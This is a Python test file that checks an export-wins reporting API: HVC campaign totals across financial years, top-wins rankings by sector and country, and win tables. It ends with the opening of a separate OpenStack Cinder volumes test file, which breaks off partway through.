self.assertEqual(api_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["grand_total"], 0)
self.assertEqual(api_response["wins"]["progress"]["status"], "red")
self.assertEqual(api_response["wins"]["progress"]["unconfirmed_percent"], 0)
self.assertEqual(api_response["wins"]["progress"]["confirmed_percent"], 0)
def test_details_no_wins_2017(self):
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(api_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(api_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(api_response["wins"]["totals"]["number"]["grand_total"], 0)
self.assertEqual(api_response["wins"]["progress"]["status"], "red")
self.assertEqual(api_response["wins"]["progress"]["unconfirmed_percent"], 0)
self.assertEqual(api_response["wins"]["progress"]["confirmed_percent"], 0)
def test_details_e017_hvc_win_for_2017_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_for_2017_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_cen_hvc_win_for_2016_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_for_2016_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_cen_hvc_win_confirmed_in_2016_appears_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_confirmed_in_2016_doesnt_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_cen_hvc_win_from_2016_confirmed_in_2017_doesnt_appears_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2017,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_cen_hvc_win_from_2016_confirmed_in_2017_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2017,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_hvc_win_from_other_region_but_cen_country_doesnt_appear_in_cen(self):
self._create_hvc_win(
hvc_code='E016',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
def test_details_hvc_win_from_other_region_other_country_doesnt_appear_in_cen(self):
self._create_hvc_win(
hvc_code='E016',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='CA'
)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
@freeze_time(MiApiViewsBaseTestCase.frozen_date_17)
def test_details_cen_hvc_win_unconfirmed_in_2016_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
confirm=False,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_unconfirmed_in_2017_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=False,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 0)
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
def test_details_cen_hvc_win_unconfirmed_multi_notifications_no_duplicates(self):
win = self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=False,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
# add couple of customer notifications
notify_date = self.win_date_2017 + datetime.timedelta(days=1)
notification = NotificationFactory(win=win)
notification.type = Notification.TYPE_CUSTOMER
notification.created = notify_date
notification.save()
notify_date = self.win_date_2017 + datetime.timedelta(days=2)
notification = NotificationFactory(win=win)
notification.type = Notification.TYPE_CUSTOMER
notification.created = notify_date
notification.save()
self.url = self.get_url_for_year(2017)
cen_response = self._api_response_data
self.assertEqual(cen_response["wins"]["totals"]["value"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["number"]["confirmed"], 0)
self.assertEqual(cen_response["wins"]["totals"]["value"]["unconfirmed"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["unconfirmed"], 1)
self.assertEqual(cen_response["wins"]["totals"]["value"]["grand_total"], self.export_value)
self.assertEqual(cen_response["wins"]["totals"]["number"]["grand_total"], 1)
@freeze_time(MiApiViewsBaseTestCase.frozen_date_17)
class HVCTopHvcForMarketAndSectorTestCase(HVCBaseViewTestCase):
TEST_CAMPAIGN_ID = "E017"
TARGET_E017_17 = 30000000
PRORATED_TARGET_17 = 2465760 # target based on the frozen date
cen_campaign_url = reverse('mi:hvc_top_wins', kwargs={"campaign_id": "E017"})
campaign_url_2016_only = reverse('mi:hvc_top_wins', kwargs={"campaign_id": "E177"})
campaign_url_2017_only = reverse('mi:hvc_top_wins', kwargs={"campaign_id": "E218"})
expected_response = {}
SECTORS_DICT = dict(SECTORS)
@classmethod
def setUpClass(cls):
super().setUpClass()
call_command('create_missing_hvcs', verbose=False)
def setUp(self):
super().setUp()
self._win_factory_function = create_win_factory(
self.user, sector_choices=self.TEAM_1_SECTORS)
self.view_base_url = self.cen_campaign_url
def test_top_hvc_with_no_wins(self):
""" Top hvc wins will be empty if there are no wins """
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_with_conformed_non_hvc_wins(self):
""" Top hvc wins will be empty when there are only confirmed non-hvc wins """
for _ in range(1, 10):
self._create_non_hvc_win(
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_with_unconformed_non_hvc_wins(self):
""" Top hvc wins will be empty when there are only unconfirmed non-hvc wins """
for _ in range(1, 10):
self._create_non_hvc_win(
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_with_unconfirmed_hvc_wins(self):
""" Top hvc wins consider unconfirmed hvc wins as well """
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=False,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) > 0)
def test_top_hvc_with_confirmed_hvc_wins(self):
""" Top hvc wins consider confirmed hvc wins as well """
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) > 0)
def test_top_hvc_with_confirmed_hvc_wins_one_sector_country(self):
""" Number of Top hvc win items will only be 1
when there are confirmed hvc wins of one country/sector """
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=self.FIRST_TEAM_1_SECTOR,
country="HU",
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 1)
def test_top_hvc_with_confirmed_hvc_wins_one_country(self):
"""
Check number of hvc wins when there are more confirmed hvc
wins of diff sector one country
"""
for sector_id in range(1, 6):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
confirm=True,
sector_id=sector_id,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 5)
def test_top_hvc_with_confirmed_hvc_wins_one_country_more_than_5(self):
"""
Check number of hvc wins when there are more than 5 hvc wins
of diff sector one country, show them all
"""
for sector_id in range(10, 21):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
confirm=True,
sector_id=sector_id,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) > 5)
def test_top_hvc_with_confirmed_hvc_wins_one_sector_diff_country(self):
""" Number of Top hvc wins will be more than 1 when there are
confirmed hvc wins of diff country one sector """
for code in ['BS', 'GQ', 'VA', 'AQ', 'SA', 'EG', 'LU', 'ER', 'GA', 'MP']:
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country=code,
sector_id=self.FIRST_TEAM_1_SECTOR,
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 10)
def test_top_hvc_with_confirmed_hvc_wins_one_sector_one_country(self):
""" Number of Top hvc wins will be 1 when there are
confirmed hvc wins of diff country one sector """
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
sector_id=self.FIRST_TEAM_1_SECTOR,
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 1)
def test_values_top_hvc_top_win_with_confirmed_hvc_wins(self):
""" Check top win is what is expected and its value, percentages are correct """
expected_top_team = self.FIRST_TEAM_1_SECTOR
for _ in range(0, 5):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
sector_id=expected_top_team,
confirm=True,
win_date=self.win_date_2017,
)
for sector_id in self.SECTORS_NOT_IN_EITHER_TEAM:
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
confirm=True,
sector_id=sector_id,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 7)
top_item = api_response[0]
self.assertEqual(top_item["sector"], self.SECTORS_DICT[expected_top_team], msg=top_item)
self.assertEqual(top_item["totalValue"], 100000 * 5, msg=top_item)
self.assertEqual(top_item["averageWinValue"], 100000)
self.assertEqual(top_item["percentComplete"], 100)
def test_top_hvc_compare_second_top_win_with_top(self):
""" Check second top win with top, its value, percentages are correct """
expected_top_team = self.FIRST_TEAM_1_SECTOR
expected_second_team = self.SECOND_TEAM_1_SECTOR
for _ in range(0, 5):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
country="HU",
sector_id=expected_top_team,
confirm=True,
win_date=self.win_date_2017,
)
for _ in range(0, 4):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=expected_second_team,
confirm=True,
country="HU",
win_date=self.win_date_2017,
)
for sector_id in self.SECTORS_NOT_IN_EITHER_TEAM:
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
confirm=True,
country="HU",
sector_id=sector_id,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 8, msg=api_response)
second_top_item = api_response[1]
percent_complete = int((100000 * 4 * 100) / (100000 * 5))
self.assertEqual(second_top_item["sector"], self.SECTORS_DICT[expected_second_team])
self.assertEqual(second_top_item["totalValue"], 100000 * 4)
self.assertEqual(second_top_item["averageWinValue"], 100000)
self.assertEqual(second_top_item["percentComplete"], percent_complete)
def test_top_hvc_check_items_percent_is_descending(self):
""" Check percentage value is in descending order """
for i in range(6, 1, -1):
for _ in range(0, i):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=self.TEAM_1_SECTORS[i],
country="HU",
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) >= 5)
self.assertTrue(api_response[0]["percentComplete"] >= api_response[1]["percentComplete"])
self.assertTrue(api_response[1]["percentComplete"] >= api_response[2]["percentComplete"])
self.assertTrue(api_response[2]["percentComplete"] >= api_response[3]["percentComplete"])
self.assertTrue(api_response[3]["percentComplete"] >= api_response[4]["percentComplete"])
def test_top_hvc_check_items_totalValue_is_descending(self):
""" Check total value is in descending order """
for i in range(6, 1, -1):
for _ in range(0, i):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=self.TEAM_1_SECTORS[i],
country="HU",
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) >= 5)
self.assertTrue(api_response[0]["totalValue"] >= api_response[1]["totalValue"])
self.assertTrue(api_response[1]["totalValue"] >= api_response[2]["totalValue"])
self.assertTrue(api_response[2]["totalValue"] >= api_response[3]["totalValue"])
self.assertTrue(api_response[3]["totalValue"] >= api_response[4]["totalValue"])
def test_top_hvc_check_items_averageWinValue_is_descending(self):
""" Check average Win Value is in descending order """
for i in range(6, 1, -1):
for _ in range(0, i):
self._create_hvc_win(
hvc_code='E017',
export_value=100000,
sector_id=self.TEAM_1_SECTORS[i],
country="HU",
confirm=True,
win_date=self.win_date_2017,
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response) >= 5)
self.assertTrue(api_response[0]["averageWinValue"] >= api_response[1]["averageWinValue"])
self.assertTrue(api_response[1]["averageWinValue"] >= api_response[2]["averageWinValue"])
self.assertTrue(api_response[2]["averageWinValue"] >= api_response[3]["averageWinValue"])
self.assertTrue(api_response[3]["averageWinValue"] >= api_response[4]["averageWinValue"])
def test_top_hvc_with_hvc_wins_from_diff_campaign(self):
for code in self.TEAM_1_HVCS:
self._create_hvc_win(
hvc_code=code,
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_with_hvc_wins_from_2016(self):
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2016,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_with_hvc_wins_from_2017_in_2016(self):
for _ in range(1, 10):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_hvc_win_from_2016_confirmed_in_2017_doesnt_appears_in_2016(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2017,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2016)
api_response = self._api_response_data
self.assertEqual(len(api_response), 0)
def test_top_hvc_hvc_win_from_2016_confirmed_in_2017_appears_in_2017(self):
self._create_hvc_win(
hvc_code='E017',
win_date=self.win_date_2016,
response_date=self.win_date_2017,
confirm=True,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertEqual(len(api_response), 1)
@freeze_time(MiApiViewsBaseTestCase.frozen_date_17)
class HVCWinTableTestCase(HVCBaseViewTestCase, GenericWinTableTestMixin):
TEST_CAMPAIGN_ID = "E002"
TEST_COUNTRY_CODE = 'HU'
cen_win_table_url = reverse('mi:hvc_win_table', kwargs={"campaign_id": "E002"})
win_table_url_2016_only = reverse('mi:hvc_win_table', kwargs={"campaign_id": "E177"})
win_table_url_2017_only = reverse('mi:hvc_win_table', kwargs={"campaign_id": "E218"})
# disable non_hvc tests
test_win_table_2017_confirmed_non_hvc = None
test_win_table_2017_unconfirmed_non_hvc = None
@classmethod
def setUpClass(cls):
super().setUpClass()
call_command('create_missing_hvcs', verbose=False)
# make names consistent for both year
HVC.objects.filter(
campaign_id=cls.TEST_CAMPAIGN_ID
).update(
name=f'HVC: {cls.TEST_CAMPAIGN_ID}'
)
def setUp(self):
super().setUp()
self._win_factory_function = create_win_factory(
self.user, sector_choices=self.TEAM_1_SECTORS)
self.view_base_url = self.cen_win_table_url
self.expected_response = {
"hvc": {
"code": "E002",
"name": "HVC: E002",
},
"wins": {
"hvc": []
}
}
def test_2017_win_table_in_2016_404(self):
self.view_base_url = self.win_table_url_2017_only
self.url = self.get_url_for_year(2016)
self._get_api_response(self.url, status_code=404)
def test_2016_win_table_in_2017_404(self):
self.view_base_url = self.win_table_url_2016_only
self.url = self.get_url_for_year(2017)
self._get_api_response(self.url, status_code=404)
def test_win_table_2017_one_confirmed_rejected_hvc_win(self):
self._create_hvc_win(
hvc_code='E002',
win_date=self.win_date_2017,
response_date=self.win_date_2017,
confirm=True,
agree_with_win=False,
fin_year=2016,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
api_response = self._api_response_data
self.assertTrue(len(api_response["wins"]["hvc"]) == 1)
win_item = api_response["wins"]["hvc"][0]
self.assertEqual(api_response["hvc"]["code"], "E002")
self.assertIsNotNone(win_item["win_date"])
self.assertEqual(win_item["export_amount"], self.export_value)
self.assertEqual(win_item["status"], "customer_rejected")
self.assertEqual(win_item["lead_officer"]["name"], "lead officer name")
self.assertEqual(win_item["company"]["name"], "company name")
self.assertEqual(win_item["company"]["id"], "cdms reference")
self.assertFalse(win_item["credit"])
def test_win_table_2017_confirmed_non_hvc_empty_result(self):
self._create_non_hvc_win(
win_date=self.win_date_2017,
confirm=True,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
self.assertResponse()
def test_win_table_2017_unconfirmed_non_hvc_empty_result(self):
self._create_non_hvc_win(
win_date=self.win_date_2017,
confirm=False,
fin_year=2017,
export_value=self.export_value,
country='HU'
)
self.url = self.get_url_for_year(2017)
self.assertResponse()
class TestGlobalHVCList(MiApiViewsBaseTestCase):
url = reverse('mi:global_hvcs') + "?year=2017"
def create_global_hvc(self):
fy2017 = FinancialYear.objects.get(id=2017)
campaign_id = 'E%03d' % self.FIRST_TEAM_1_SECTOR
sector_team = SectorTeamFactory.create()
hvc_group = FuzzyChoice(HVCGroup.objects.all())
target = TargetFactory.create(
campaign_id=campaign_id,
financial_year=fy2017,
hvc_group=hvc_group,
sector_team=sector_team
)
TargetCountry(target=target, country=Country.objects.get(country='XG')).save()
return target
def test_2017_returns_1_hvcs(self):
target = self.create_global_hvc()
data = self._api_response_data
self.assertEqual(
data,
[{
"code": target.campaign_id,
"name": f"HVC: {target.campaign_id}"
}]
)
def test_2016_returns_0_hvcs(self):
self.create_global_hvc()
self.url = reverse('mi:global_hvcs') + "?year=2016"
data = self._api_response_data
self.assertEqual(
data,
[]
)
def test_2017_returns_0_hvs_if_none_exist(self):
data = self._api_response_data
self.assertEqual(
data,
[]
)
class TestOpenHVCs(TestCase):
@classmethod
def setUpTestData(cls):
super().setUpTestData()
call_command('create_missing_hvcs', verbose=False)
def test_open_hvcs_can_accept_year_in_2_digit_format(self):
fin_year = normalize_year(16)
self.assertEqual(
16,
fin_year
)
def test_open_hvcs_can_accept_year_in_4_digit_format(self):
fin_year = normalize_year(2016)
self.assertEqual(
fin_year,
16
)
def test_open_hvcs_can_accept_year_in_django_model_format(self):
fy2016 = FinancialYear.objects.get(id=2016)
fin_year = normalize_year(fy2016)
self.assertEqual(
fin_year,
16
)
def test_hvc_in_2016_show_up_in_open_hvcs_list(self):
open_hvcs = _get_open_hvcs(2017)
hvcs2017 = set(HVC.objects.filter(financial_year=17).values_list('campaign_id', flat=True))
self.assertEqual(
open_hvcs,
hvcs2017
)
def test_both2016and2017hvcs_in_2016_open_hvcs_list(self):
open_hvcs = _get_open_hvcs(2016)
hvcs2017 = set(HVC.objects.filter(financial_year=17).values_list('campaign_id', flat=True))
hvcs2016 = set(HVC.objects.filter(financial_year=16).values_list('campaign_id', flat=True))
self.assertEqual(
open_hvcs,
hvcs2017.union(hvcs2016)
)
def test_make_new_financial_year_test_2016_fin_year_is_unaffected(self):
open_hvcs_for_2016 = _get_open_hvcs(2016)
for i in range(10):
HVCFactory.create(
campaign_id='E%03d' % (i + 1),
financial_year=normalize_year(2018)
)
self.assertEqual(
open_hvcs_for_2016,
_get_open_hvcs(2016)
)
def test_make_new_financial_year_test_2018_fin_year_is_correct(self):
for i in range(10):
HVCFactory.create(
campaign_id='E%03d' % (i + 1),
financial_year=normalize_year(2018)
)
open_hvcs_for_2018 = _get_open_hvcs(2018)
self.assertEqual(
open_hvcs_for_2018,
{'E%03d' % (x + 1) for x in range(10)}
)
def test_make_new_financial_year_test_2017_fin_year_is_correct(self):
open_hvcs_for_2017 = _get_open_hvcs(2017)
for i in range(10):
HVCFactory.create(
campaign_id='E%03d' % (i + 1),
financial_year=normalize_year(2018)
)
self.assertEqual(
open_hvcs_for_2017,
_get_open_hvcs(2017)
)
| gpl-3.0 | -5,138,177,416,890,777,000 | 40.575639 | 99 | 0.577568 | false |
eharney/cinder | cinder/tests/functional/test_volumes.py | 1 | 5004 | # Copyright 2011 Justin Santa Barbara
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from oslo_utils import uuidutils
from cinder.tests.functional import functional_helpers
from cinder.volume import configuration
class VolumesTest(functional_helpers._FunctionalTestBase):
_vol_type_name = 'functional_test_type'
def setUp(self):
super(VolumesTest, self).setUp()
self.api.create_type(self._vol_type_name)
def _get_flags(self):
f = super(VolumesTest, self)._get_flags()
f['volume_driver'] = (
{'v': 'cinder.tests.fake_driver.FakeLoggingVolumeDriver',
'g': configuration.SHARED_CONF_GROUP})
f['default_volume_type'] = {'v': self._vol_type_name}
return f
def test_get_volumes_summary(self):
"""Simple check that listing volumes works."""
volumes = self.api.get_volumes(False)
self.assertIsNotNone(volumes)
def test_get_volumes(self):
